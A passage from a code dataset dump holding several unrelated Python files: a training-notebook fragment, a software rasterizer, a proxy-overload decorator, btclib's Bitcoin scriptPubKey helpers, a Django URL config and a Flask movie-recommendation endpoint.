test(validationLoader)\n print (evalloss)\n if eachEpoch > 1 and evalloss > prevLoss:\n continue\n \n print (\"Found Better model with loss :{:.4f}, PreviousLoss:{:.4f}\".format(evalloss,prevLoss))\n prevLoss = evalloss\n #Save the best model\n bestmodelFile = os.path.join(outpath,'bestModel.pt')\n pickle.dump(model,open(bestmodelFile,'wb'))\n \n #Output results in file\n results('val', output, evalloss, eachEpoch)\n \n\n\n# ### Run Test results with the best model\n\n# In[61]:\n\n\n\ntrainedModelFile = os.path.join(outpath,'bestModel.pt')\nisVal = False\nbestModel = pickle.load(open(trainedModelFile,'rb'))\noutput, evalloss = test(testLoader,model)\nresults('test', output, evalloss, 0)\nprint(\"Test Results:\\n Loss:{:.4f}\".format(evalloss))\n\noutput, evalloss = test(trainLoader,model)\nresults('train', output, evalloss, 0)\nprint(\"Train Results:\\n Loss:{:.4f}\".format(evalloss))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"models/dl/AnalysisTokensMissingPubmedW2V.py","file_name":"AnalysisTokensMissingPubmedW2V.py","file_ext":"py","file_size_in_byte":12066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"329647672","text":"import numpy as np\nfrom collections import namedtuple\n\nfrom obj import Obj\nfrom utils.gl_color import color, decimalToRgb\nfrom utils.gl_encode import char, word, dword\nfrom utils.gl_math import cross, dot, substract, norm, V2, V3\n\nBLACK = color(0,0,0)\nWHITE = color(1,1,1)\n\ndef baryCoords(A, B, C, P):\n # u es para la A, v es para B, w para C\n try:\n u = ( ((B.y - C.y)*(P.x - C.x) + (C.x - B.x)*(P.y - C.y) ) /\n ((B.y - C.y)*(A.x - C.x) + (C.x - B.x)*(A.y - C.y)) )\n\n v = ( ((C.y - A.y)*(P.x - C.x) + (A.x - C.x)*(P.y - C.y) ) /\n ((B.y - C.y)*(A.x - C.x) + (C.x - B.x)*(A.y - C.y)) )\n\n w = 1 - u - v\n except:\n return -1, -1, -1\n\n return u, v, w\n\n\nclass Render(object):\n def __init__(self, width, height):\n self.curr_color = WHITE\n self.clear_color = BLACK\n self.glCreateWindow(width, height)\n\n self.light = V3(0,0,1)\n self.active_texture = None\n\n self.active_shader = None\n\n def glCreateWindow(self, width, height):\n self.width = width\n self.height = height\n self.glClear()\n self.glViewport(0,0, width, height)\n\n def glViewport(self, x, y, width, height):\n self.viewport_initial_x = x\n self.viewport_initial_y = y\n self.viewport_width = width\n self.viewport_height = height\n self.viewport_final_x = x + width\n self.viewport_final_y = x + height\n\n def glClear(self):\n self.pixels = [ [ self.clear_color for x in range(self.width)] for y in range(self.height) ]\n \n # Zbuffer\n self.zbuffer = [ [ -float('inf') for x in range(self.width)] for y in range(self.height) ]\n \n def glVertextInViewport(self, x,y):\n return (x >= self.viewport_initial_x and\n x <= self.viewport_final_x) and (\n y >= self.viewport_initial_y and\n y <= self.viewport_final_y)\n\n\n def glVertex(self, x, y, color = None):\n pixelX = ( x + 1) * (self.vpWidth / 2 ) + self.vpX\n pixelY = ( y + 1) * (self.vpHeight / 2 ) + self.vpY\n \n if pixelX >= self.width or pixelX < 0 or pixelY >= self.height or pixelY < 0:\n return\n\n try:\n self.pixels[round(pixelY)][round(pixelX)] = color or self.curr_color\n except:\n pass\n \n def glPoint(self, x, y, color = None):\n if x >= self.width or x < 0 or y >= self.height or y < 0:\n return\n try:\n self.pixels[y][x] = color or self.curr_color\n except:\n pass\n \n def glColor(self, r,g,b):\n self.curr_color = color(r,g,b)\n\n def glClearColor(self, r,g,b):\n self.clear_color = color(r,g,b)\n\n def glFixCoordinate(self, value, main_axis):\n fixed_coordinate = 0\n if main_axis:\n fixed_coordinate = (value+1) * (self.viewport_width/2) + self.viewport_initial_x\n else:\n fixed_coordinate = (value+1) * (self.viewport_height/2) + self.viewport_initial_y\n return round(fixed_coordinate)\n \n \n # Generate .bmp fil\n def glFinish(self, filename):\n archivo = open(filename, 'wb')\n\n # File header 14 bytes\n archivo.write(bytes('B'.encode('ascii')))\n archivo.write(bytes('M'.encode('ascii')))\n\n archivo.write(dword(14 + 40 + self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(14 + 40))\n\n # Image Header 40 bytes\n archivo.write(dword(40))\n archivo.write(dword(self.width))\n archivo.write(dword(self.height))\n archivo.write(word(1))\n archivo.write(word(24))\n archivo.write(dword(0))\n archivo.write(dword(self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n \n # Pixeles, 3 bytes cada uno\n\n for x in range(self.height):\n for y in range(self.width):\n archivo.write(self.pixels[x][y])\n\n archivo.close()\n\n def glZBuffer(self, filename):\n archivo = open(filename, 'wb')\n\n # File header 14 bytes\n archivo.write(bytes('B'.encode('ascii')))\n archivo.write(bytes('M'.encode('ascii')))\n archivo.write(dword(14 + 40 + self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(14 + 40))\n\n # Image Header 40 bytes\n archivo.write(dword(40))\n archivo.write(dword(self.width))\n archivo.write(dword(self.height))\n archivo.write(word(1))\n archivo.write(word(24))\n archivo.write(dword(0))\n archivo.write(dword(self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n\n # Minimo y el maximo\n minZ = float('inf')\n maxZ = -float('inf')\n for x in range(self.height):\n for y in range(self.width):\n if self.zbuffer[x][y] != -float('inf'):\n if self.zbuffer[x][y] < minZ:\n minZ = self.zbuffer[x][y]\n\n if self.zbuffer[x][y] > maxZ:\n maxZ = self.zbuffer[x][y]\n\n for x in range(self.height):\n for y in range(self.width):\n depth = self.zbuffer[x][y]\n if depth == -float('inf'):\n depth = minZ\n depth = (depth - minZ) / (maxZ - minZ)\n archivo.write(color(depth,depth,depth))\n\n archivo.close()\n \n def glLine(self, v0, v1, color = None) :\n x0 = self.glFixCoordinate(v0.x, True)\n x1 = self.glFixCoordinate(v1.x, True)\n y0 = self.glFixCoordinate(v0.y, False)\n y1 = self.glFixCoordinate(v1.y, False)\n\n steep = abs(y1 - y0) > abs(x1 - x0)\n\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx, dy = abs(x1 - x0), abs(y1 - y0) \n \n offset = 0\n limit = 0.5\n y = y0\n\n for x in range(x0, x1+1):\n self.glPoint(y, x, color) if steep else self.glPoint(x, y, color)\n \n offset += 2*dy\n\n if offset >= limit:\n y += 1 if y0 < y1 else -1\n limit += 2*dx\n\n def glLine_coord(self, v0, v1, color = None):\n x0 = v0.x\n x1 = v1.x\n y0 = v0.y\n y1 = v1.y\n\n steep = abs(y1 - y0) > abs(x1 - x0)\n\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx, dy = abs(x1 - x0), abs(y1 - y0) \n \n offset = 0\n limit = 0.5\n y = y0\n \n try:\n m = dy/dx\n except ZeroDivisionError:\n pass\n \n for x in range(x0, x1+1):\n self.glPoint(y, x, color) if steep else self.glPoint(x, y, color)\n \n offset += 2*dy\n\n if offset >= limit:\n y += 1 if y0 < y1 else -1\n limit += 2*dx \n \n def transform(self, vertex, translate=V3(0,0,0), scale=V3(1,1,1)):\n return V3(round(vertex[0] * scale.x + translate.x),\n round(vertex[1] * scale.y + translate.y),\n round(vertex[2] * scale.z + translate.z))\n \n # Check if a given point (x,y) is inside the polygon\n def glIsPointInPolygon(self, x, y, polygon):\n # Args:\n # x: the x coordinate of point.\n # y: the y coordinate of point.\n # polygon: a list of tuples [(x, y), (x, y), ...] representing the vertices of the polygon\n\n # Returns:\n # True if the point is in the path.\n verticesCount = len(polygon)\n j = verticesCount - 1\n c = False\n for i in range(verticesCount):\n if ((polygon[i][1] > y) != (polygon[j][1] > y)) and \\\n (x < polygon[i][0] + (polygon[j][0] - polygon[i][0]) * (y - polygon[i][1]) /\n (polygon[j][1] - polygon[i][1])):\n c = not c\n j = i\n return c\n \n # Fill the polygon\n def glFillPolygon(self, polygon):\n # Args:\n # polygon: a list of tuples [(x, y), (x, y), ...] representing the vertices of the polygon\n\n # Returns:\n # nothing\n \n minX, maxX, minY, maxY = 0,0,0,0\n \n # Calculate the min and max points in x-axis and y-axis for the polygon\n for i in range(len(polygon)):\n if(polygon[i][0] < minX):\n minX = polygon[i][0]\n elif(polygon[i][0] > maxX):\n maxX = polygon[i][0]\n if(polygon[i][1] < minY):\n minY = polygon[i][1]\n elif(polygon[i][1] > maxY):\n maxY = polygon[i][1]\n\n # Iterate over those numbers and check if every point is in the polygon\n # If it is, fill it\n for y in range(minY, maxY):\n for x in range(minX, maxX):\n if (self.glIsPointInPolygon(x,y, polygon)):\n self.glPoint(x, y)\n \n # Draw the polygon joining the dots with glLinge_coord\n def glDrawPolygon(self, vertices):\n count = len(vertices)\n\n for limit in range(count):\n v0 = vertices[limit]\n v1 = vertices[(limit + 1) % count]\n self.glLine_coord(v0[0], v0[1], v1[0], v1[1])\n\n\n def loadModel(self, filename, translate = V3(0,0,0), scale = V3(1,1,1), isWireframe = False):\n model = Obj(filename)\n\n for face in model.faces:\n\n vertCount = len(face)\n\n if isWireframe:\n for vert in range(vertCount):\n v0 = model.vertices[ face[vert][0] - 1 ]\n v1 = model.vertices[ face[(vert + 1) % vertCount][0] - 1]\n v0 = V2(round(v0[0] * scale.x + translate.x),round(v0[1] * scale.y + translate.y))\n v1 = V2(round(v1[0] * scale.x + translate.x),round(v1[1] * scale.y + translate.y))\n self.glLine_coord(v0, v1)\n\n else:\n v0 = model.vertices[ face[0][0] - 1 ]\n v1 = model.vertices[ face[1][0] - 1 ]\n v2 = model.vertices[ face[2][0] - 1 ]\n if vertCount > 3:\n v3 = model.vertices[ face[3][0] - 1 ]\n\n v0 = self.transform(v0,translate, scale)\n v1 = self.transform(v1,translate, scale)\n v2 = self.transform(v2,translate, scale)\n if vertCount > 3:\n v3 = self.transform(v3,translate, scale)\n\n if self.active_texture:\n vt0 = model.texcoords[face[0][1] - 1]\n vt1 = model.texcoords[face[1][1] - 1]\n vt2 = model.texcoords[face[2][1] - 1]\n vt0 = V2(vt0[0], vt0[1])\n vt1 = V2(vt1[0], vt1[1])\n vt2 = V2(vt2[0], vt2[1])\n if vertCount > 3:\n vt3 = model.texcoords[face[3][1] - 1]\n vt3 = V2(vt3[0], vt3[1])\n else:\n vt0 = V2(0,0) \n vt1 = V2(0,0) \n vt2 = V2(0,0) \n vt3 = V2(0,0)\n vn0 = model.normals[face[0][2] - 1]\n vn1 = model.normals[face[1][2] - 1]\n vn2 = model.normals[face[2][2] - 1]\n if vertCount > 3:\n vn3 = model.normals[face[3][2] - 1]\n\n self.triangle_bc(v0,v1,v2, texcoords = (vt0,vt1,vt2), normals = (vn0,vn1,vn2))\n if vertCount > 3: #asumamos que 4, un cuadrado\n self.triangle_bc(v0,v2,v3, texcoords = (vt0,vt2,vt3), normals = (vn0,vn2,vn3)) \n \n #Barycentric Coordinates\n def triangle_bc(self, A, B, C, texcoords = (), normals = (), _color = None):\n #bounding box\n minX = min(A.x, B.x, C.x)\n minY = min(A.y, B.y, C.y)\n maxX = max(A.x, B.x, C.x)\n maxY = max(A.y, B.y, C.y)\n\n for x in range(minX, maxX + 1):\n for y in range(minY, maxY + 1):\n if x >= self.width or x < 0 or y >= self.height or y < 0:\n continue\n\n u, v, w = baryCoords(A, B, C, V2(x, y))\n\n if u >= 0 and v >= 0 and w >= 0:\n\n z = A.z * u + B.z * v + C.z * w\n if z > self.zbuffer[y][x]:\n \n r, g, b = self.active_shader(\n self,\n verts=(A,B,C),\n baryCoords=(u,v,w),\n texCoords=texcoords,\n normals=normals,\n color = _color or self.curr_color)\n\n self.glPoint(x, y, color(r,g,b))\n self.zbuffer[y][x] = z\n\n\n","sub_path":"gl.py","file_name":"gl.py","file_ext":"py","file_size_in_byte":13068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"512978304","text":"\"\"\"\nProvides class decorator @provideOverloads for creating the necessary\n__dunder__ methods based on the embeded object of a proxy/delegation object.\n\nOptionally and ideally, one can define a `name` parameter for defining the embeded\nobject for which we want to redirect built-in operations.\n\nIf one is not supplied, a generic and unsound method to detect it\nis performed with `force_exception`. If that fails (and the embeded object is initialized)\nwe make the false assumption that the sole argument in the `__dict__` of the proxy\nobject is the instance of the embedded object.\n\nIn short, supply a `name` parameter indicating the name of the embedded object.\n\nIn addition, you can supply the names of the dunder methods for which overloading sound\nbe performed (as is, ALL methods of the embedded object are added) (TBT)\n\nLook at the self test code at the bottom for a small demo. (TBD)\n\"\"\"\n\nimport sys\nimport traceback\nimport inspect\nif __name__ == \"__main__\":\n from dunders import dunders\nelse:\n from proxyOverload.dunders import dunders\n\n# Ignore these special methods.\nIGNORES = ['__weakref__', '__doc__', '__dict__', '__module__', '__init__']\n\n\ndef provideOverloads(name=None, overloads=None):\n \"\"\"\n Description:\n ------------\n Provide arguments for the decoration call.\n\n Arguments:\n -----------\n @name : Name of the embedded object in cls\n @overloads: Container with the method names.\n\n Return:\n -------\n @wrapMe: function for wrapping the proxy class.\n \"\"\"\n def wrapMe(cls):\n \"\"\"\n Description:\n ------------\n Wrap class cls and return it after adding\n the needed methods.\n\n Arguments:\n ----------\n @cls: proxy class\n\n Return:\n -------\n @cls: proxy class with added methods.\n \"\"\"\n # testing (globals generally wont give me what I want)\n # need a different way to access namespace of module\n # in which cls is defined.\n namespace = get_module_namespace(cls)\n\n if name is None:\n obj = force_exception(cls)\n else:\n try:\n obj = namespace[name]\n except KeyError:\n print(\"Parameter {} does not exist in the global dictionary.\".format(name))\n print(\"No overloading could be performed.\")\n\n # Add dunders to cls\n for dmeth in obj.__dict__:\n if dmeth not in IGNORES and dunderCheck(dmeth):\n # ignore dunders not in overloads if defined.\n if overloads and dmeth not in overloads:\n continue\n setattr(cls, dmeth, dunders[dmeth])\n return cls\n return wrapMe\n\n\ndef force_exception(cls):\n \"\"\"\n Description:\n ------------\n Try and force an exception in the creation of the\n embedded object in hopes that you might catch the\n name of it in the\n\n Arguments:\n -----------\n @cls : Proxy Class\n\n Return:\n -------\n The class of the embedded object.\n \"\"\"\n namespace = get_module_namespace(cls)\n c = None\n try:\n c = cls() # we try to initialize\n except: # intentionally broad. # except TypeError as t might be more suitable\n *_, exc_traceback = sys.exc_info()\n lines = traceback.format_exc().splitlines()\n name = lines[-2].split(\"=\")[1].split(\"(\")[0].strip()\n\n return namespace[name]\n name = list(c.__dict__.values())[0]\n return name.__class__\n\n\ndef get_module_namespace(cls):\n \"\"\"\n Get the namespace in which cls is defined.\n (This should generally contain the embedded instance)\n \"\"\"\n return vars(sys.modules[cls.__module__])\n\n\ndef dunderCheck(name):\n \"\"\"\n Check if a method name is a dunder (__name__)\n \"\"\"\n return True if name.startswith(\"__\") and name.endswith(\"__\") else False\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"ProxyOverload/proxyOverload/proxyOverload.py","file_name":"proxyOverload.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"355374934","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2021 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\n\"ScriptPubKey functions.\"\n\nfrom typing import Callable, List, Optional, Tuple\n\nfrom btclib import var_bytes\nfrom btclib.alias import Octets, String\nfrom btclib.ecc.sec_point import point_from_octets\nfrom btclib.exceptions import BTClibValueError\nfrom btclib.hashes import hash160_from_key\nfrom btclib.script.script import serialize\nfrom btclib.to_pub_key import Key, pub_keyinfo_from_key\nfrom btclib.utils import bytes_from_octets, bytesio_from_binarydata, hash160, sha256\n\n# 1. Hash/WitnessProgram from pub_key/script_pub_key\n\n# hash160_from_key, hash160, and sha256\n# are imported from hashes.py and utils.py\n\n\n# 2. script_pub_key from Hash/WitnessProgram and vice versa\n\n\ndef _is_funct(assert_funct: Callable[[Octets], None], script_pub_key: Octets) -> bool:\n\n try:\n # if the assert function detects a problem, it must rise an Exception\n assert_funct(script_pub_key)\n # must always return a bool: all Exceptions are catched\n except Exception: # pylint: disable=broad-except\n return False\n return True\n\n\ndef assert_p2pk(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key, (35, 67))\n # p2pk [pub_key, OP_CHECKSIG]\n # 0x41{65-byte pub_key}AC\n # or\n # 0x21{33-byte pub_key}AC\n if script_pub_key[-1] != 0xAC:\n raise BTClibValueError(\"missing final OP_CHECKSIG\")\n\n len_marker = script_pub_key[0]\n length = len(script_pub_key)\n if length == 35:\n if len_marker != 0x21:\n err_msg = f\"invalid pub_key length marker: {len_marker}\"\n err_msg += f\" instead of {0x21}\"\n raise BTClibValueError(err_msg)\n elif length == 67:\n if len_marker != 0x41:\n err_msg = f\"invalid pub_key length marker: {len_marker}\"\n err_msg += f\" instead of {0x41}\"\n raise BTClibValueError(err_msg)\n\n pub_key = script_pub_key[1:-1]\n point_from_octets(pub_key)\n\n\ndef is_p2pk(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2pk, script_pub_key)\n\n\ndef assert_p2pkh(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key, 25)\n # p2pkh [OP_DUP, OP_HASH160, pub_key hash, OP_EQUALVERIFY, OP_CHECKSIG]\n # 0x76A914{20-byte pub_key_hash}88AC\n if script_pub_key[-2:] != b\"\\x88\\xac\":\n raise BTClibValueError(\"missing final OP_EQUALVERIFY, OP_CHECKSIG\")\n if script_pub_key[:2] != b\"\\x76\\xa9\":\n raise BTClibValueError(\"missing leading OP_DUP, OP_HASH160\")\n if script_pub_key[2] != 0x14:\n err_msg = f\"invalid pub_key hash length marker: {script_pub_key[2]}\"\n err_msg += f\" instead of {0x14}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_p2pkh(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2pkh, script_pub_key)\n\n\ndef assert_p2sh(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key, 23)\n # p2sh [OP_HASH160, redeem_script hash, OP_EQUAL]\n # 0xA914{20-byte redeem_script hash}87\n if script_pub_key[-1] != 0x87:\n raise BTClibValueError(\"missing final OP_EQUAL\")\n if script_pub_key[0] != 0xA9:\n raise BTClibValueError(\"missing leading OP_HASH160\")\n if script_pub_key[1] != 0x14:\n err_msg = f\"invalid redeem script hash length marker: {script_pub_key[1]}\"\n err_msg += f\" instead of {0x14}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_p2sh(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2sh, script_pub_key)\n\n\ndef assert_p2ms(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key)\n # p2ms [m, pub_keys, n, OP_CHECKMULTISIG]\n length = len(script_pub_key)\n if length < 37:\n raise BTClibValueError(f\"invalid length {length}\")\n if script_pub_key[-1] != 0xAE:\n raise BTClibValueError(\"missing final OP_CHECKMULTISIG\")\n m = script_pub_key[0] - 80\n if not 0 < m < 17:\n raise BTClibValueError(f\"invalid m in m-of-n: {m}\")\n n = script_pub_key[-2] - 80\n if not m <= n < 17:\n raise BTClibValueError(f\"invalid m-of-n: {m}-of-{n}\")\n\n stream = bytesio_from_binarydata(script_pub_key[1:-2])\n for _ in range(n):\n pub_key = var_bytes.parse(stream)\n point_from_octets(pub_key)\n\n if stream.read(1):\n raise BTClibValueError(\"invalid extra data\")\n\n\ndef is_p2ms(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2ms, script_pub_key)\n\n\ndef assert_nulldata(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key)\n # nulldata [OP_RETURN, data]\n length = len(script_pub_key)\n if length == 0:\n raise BTClibValueError(\"null length\")\n if script_pub_key[0] != 0x6A:\n raise BTClibValueError(\"missing leading OP_RETURN\")\n\n if length == 78 or length >= 84:\n raise BTClibValueError(f\"invalid length {length}\")\n\n # OP_RETURN, data length, data up to 75 bytes max\n # 0x6A{1 byte data-length}{data (0-75 bytes)}\n if length < 78:\n if script_pub_key[1] != length - 2:\n raise BTClibValueError(f\"invalid data length marker {script_pub_key[1]}\")\n # OP_RETURN, OP_PUSHDATA1, data length, data min 76 bytes up to 80\n # 0x6A4C{1-byte data-length}{data (76-80 bytes)}\n elif script_pub_key[1] != 0x4C or script_pub_key[2] != length - 3:\n err_msg = f\"invalid data length marker {script_pub_key[1:2].hex()}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_nulldata(script_pub_key: Octets) -> bool:\n return _is_funct(assert_nulldata, script_pub_key)\n\n\ndef assert_p2wpkh(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key, 22)\n # p2wpkh [0, pub_key hash]\n # 0x0014{20-byte pub_key hash}\n if script_pub_key[0] != 0:\n err_msg = f\"invalid witness version: {script_pub_key[0]}\"\n err_msg += f\" instead of {0}\"\n raise BTClibValueError(err_msg)\n if script_pub_key[1] != 0x14:\n err_msg = f\"invalid pub_key hash length marker: {script_pub_key[1]}\"\n err_msg += f\" instead of {0x14}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_p2wpkh(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2wpkh, script_pub_key)\n\n\ndef assert_p2wsh(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key, 34)\n # p2wsh [0, redeem_script hash]\n # 0x0020{32-byte redeem_script hash}\n if script_pub_key[0] != 0:\n err_msg = f\"invalid witness version: {script_pub_key[0]}\"\n err_msg += f\" instead of {0}\"\n raise BTClibValueError(err_msg)\n if script_pub_key[1] != 0x20:\n err_msg = f\"invalid redeem script hash length marker: {script_pub_key[1]}\"\n err_msg += f\" instead of {0x20}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_p2wsh(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2wsh, script_pub_key)\n\n\ndef script_pub_key_from_payload(script_type: str, payload: Octets) -> bytes:\n \"Return the script_pub_key for the provided script_type and payload.\"\n # sourcery skip: switch\n\n script_type = script_type.lower()\n\n if script_type == \"p2ms\":\n script_pub_key = bytes_from_octets(payload) + b\"\\xae\"\n if not is_p2ms(script_pub_key):\n raise BTClibValueError(\"invalid p2ms payload\")\n return script_pub_key\n\n if script_type == \"nulldata\":\n payload = bytes_from_octets(payload)\n if len(payload) > 80:\n err_msg = f\"invalid nulldata script length: {len(payload)} bytes \"\n raise BTClibValueError(err_msg)\n return serialize([\"OP_RETURN\", payload])\n\n if script_type == \"p2pk\":\n payload = bytes_from_octets(payload, (33, 65))\n # TODO: check it is a valid pub_key\n return serialize([payload, \"OP_CHECKSIG\"])\n\n if script_type == \"p2wsh\":\n payload = bytes_from_octets(payload, 32)\n return serialize([0, payload])\n\n if script_type == \"p2pkh\":\n payload = bytes_from_octets(payload, 20)\n return serialize(\n [\n \"OP_DUP\",\n \"OP_HASH160\",\n payload,\n \"OP_EQUALVERIFY\",\n \"OP_CHECKSIG\",\n ]\n )\n\n if script_type == \"p2sh\":\n payload = bytes_from_octets(payload, 20)\n return serialize([\"OP_HASH160\", payload, \"OP_EQUAL\"])\n\n if script_type == \"p2wpkh\":\n payload = bytes_from_octets(payload, 20)\n return serialize([0, payload])\n\n raise BTClibValueError(f\"unknown script_pub_key type: {script_type}\")\n\n\ndef payload_from_script_pub_key(script_pub_key: Octets) -> Tuple[str, bytes]:\n \"Return (script_pub_key type, payload) from the input script_pub_key.\"\n\n script_pub_key = bytes_from_octets(script_pub_key)\n\n if is_p2wpkh(script_pub_key):\n # p2wpkh [0, pub_key_hash]\n # 0x0014{20-byte pub_key_hash}\n return \"p2wpkh\", script_pub_key[2:]\n\n if is_p2wsh(script_pub_key):\n # p2wsh [0, script_hash]\n # 0x0020{32-byte script_hash}\n return \"p2wsh\", script_pub_key[2:]\n\n if is_p2pk(script_pub_key):\n # p2pk [pub_key, OP_CHECKSIG]\n # 0x41{65-byte pub_key}AC or 0x21{33-byte pub_key}AC\n return \"p2pk\", script_pub_key[1:-1]\n\n if is_p2ms(script_pub_key):\n # p2ms [m, pub_keys, n, OP_CHECKMULTISIG]\n return \"p2ms\", script_pub_key[:-1]\n\n if is_nulldata(script_pub_key):\n # nulldata [OP_RETURN, data]\n if len(script_pub_key) < 78:\n # OP_RETURN, data length, data up to 75 bytes max\n # 0x6A{1 byte data-length}{data (0-75 bytes)}\n return \"nulldata\", script_pub_key[2:]\n\n # OP_RETURN, OP_PUSHDATA1, data length, data min 76 bytes up to 80\n # 0x6A4C{1-byte data-length}{data (76-80 bytes)}\n return \"nulldata\", script_pub_key[3:]\n\n if is_p2pkh(script_pub_key):\n # p2pkh [OP_DUP, OP_HASH160, pub_key_hash, OP_EQUALVERIFY, OP_CHECKSIG]\n # 0x76A914{20-byte pub_key_hash}88AC\n length = len(script_pub_key)\n return \"p2pkh\", script_pub_key[3 : length - 2]\n\n if is_p2sh(script_pub_key):\n # p2sh [OP_HASH160, script_hash, OP_EQUAL]\n # 0xA914{20-byte script_hash}87\n length = len(script_pub_key)\n return \"p2sh\", script_pub_key[2 : length - 1]\n\n return \"unknown\", script_pub_key\n\n\n# 1.+2. = 3. script_pub_key from key(s)/script\n\n\ndef p2pk(key: Key) -> bytes:\n \"Return the p2pk script_pub_key of the provided key.\"\n\n payload, _ = pub_keyinfo_from_key(key)\n return script_pub_key_from_payload(\"p2pk\", payload)\n\n\ndef p2ms(\n m: int, keys: List[Key], lexi_sort: bool = True, compressed: Optional[bool] = None\n) -> bytes:\n \"\"\"Return the m-of-n multi-sig script_pub_key of the provided keys.\n\n BIP67 endorses lexicographica key sorting\n according to compressed key representation.\n\n Note that sorting uncompressed keys (leading 0x04 byte) results\n in a different order than sorting the same keys in compressed\n (leading 0x02 or 0x03 bytes) representation.\n\n https://github.com/bitcoin/bips/blob/master/bip-0067.mediawiki\n \"\"\"\n m += 80\n payload = m.to_bytes(1, byteorder=\"big\", signed=False)\n pub_keys = [pub_keyinfo_from_key(k, compressed=compressed)[0] for k in keys]\n if lexi_sort:\n pub_keys = sorted(pub_keys)\n payload += b\"\".join([var_bytes.serialize(k) for k in pub_keys])\n n = len(keys) + 80\n payload += n.to_bytes(1, byteorder=\"big\", signed=False)\n return script_pub_key_from_payload(\"p2ms\", payload)\n\n\ndef nulldata(data: String) -> bytes:\n \"Return the nulldata script_pub_key of the provided data.\"\n\n if isinstance(data, str):\n # do not strip spaces\n data = data.encode()\n\n return script_pub_key_from_payload(\"nulldata\", data)\n\n\ndef p2pkh(key: Key, compressed: Optional[bool] = None) -> bytes:\n \"Return the p2pkh script_pub_key of the provided key.\"\n\n pub_key_h160, _ = hash160_from_key(key, compressed=compressed)\n return script_pub_key_from_payload(\"p2pkh\", pub_key_h160)\n\n\ndef p2sh(redeem_script: Octets) -> bytes:\n \"Return the p2sh script_pub_key of the provided redeem script.\"\n\n script_h160 = hash160(redeem_script)\n return script_pub_key_from_payload(\"p2sh\", script_h160)\n\n\ndef p2wpkh(key: Key) -> bytes:\n \"\"\"Return the p2wpkh script_pub_key of the provided key.\n\n If the provided key is a public one, it must be compressed.\n \"\"\"\n\n pub_key_h160, _ = hash160_from_key(key, compressed=True)\n return script_pub_key_from_payload(\"p2wpkh\", pub_key_h160)\n\n\ndef p2wsh(redeem_script: Octets) -> bytes:\n \"Return the p2wsh script_pub_key of the provided redeem script.\"\n\n script_h256 = sha256(redeem_script)\n return script_pub_key_from_payload(\"p2wsh\", script_h256)\n","sub_path":"btclib/script_pub_key.py","file_name":"script_pub_key.py","file_ext":"py","file_size_in_byte":13010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"435921871","text":"from django.conf.urls import patterns\n\nurlpatterns = patterns('relationships_service.views',\n (r'add_campaign/$', 'add_campaign'),\n (r'^(?P.+?)/(?P.+?)/$', 'get_relationships'),\n)\n\ndef register_api(v1_api):\n from relationships_service.api import RelationshipsServiceResource\n v1_api.register(RelationshipsServiceResource())\n","sub_path":"relationships_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"210711291","text":"from flask import Flask\nfrom flask_cors import CORS\nfrom flask import jsonify, make_response, request\nimport json, requests\nimport numpy as np\n\nRETRIEVAL_URL = \"http://localhost:8501/v1/models/retrieval:predict\"\nRANKING_URL = \"http://localhost:8501/v1/models/ranking:predict\"\nNUM_OF_CANDIDATES = 10\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/recommend\", methods=[\"POST\"])\ndef get_recommendations():\n user_id = request.get_json()[\"user_id\"]\n retrieval_request = json.dumps({\"instances\": [user_id]})\n retrieval_response = requests.post(RETRIEVAL_URL, data=retrieval_request)\n movie_candidates = retrieval_response.json()[\"predictions\"][0][\"output_2\"]\n\n ranking_queries = [\n {\"user_id\": u, \"movie_title\": m}\n for (u, m) in zip([user_id] * NUM_OF_CANDIDATES, movie_candidates)\n ]\n ranking_request = json.dumps({\"instances\": ranking_queries})\n ranking_response = requests.post(RANKING_URL, data=ranking_request)\n movies_scores = list(np.squeeze(ranking_response.json()[\"predictions\"]))\n ranked_movies = [\n m[1] for m in sorted(list(zip(movies_scores, movie_candidates)), reverse=True)\n ]\n\n return make_response(jsonify({\"movies\": ranked_movies}), 200)\n\n\nif 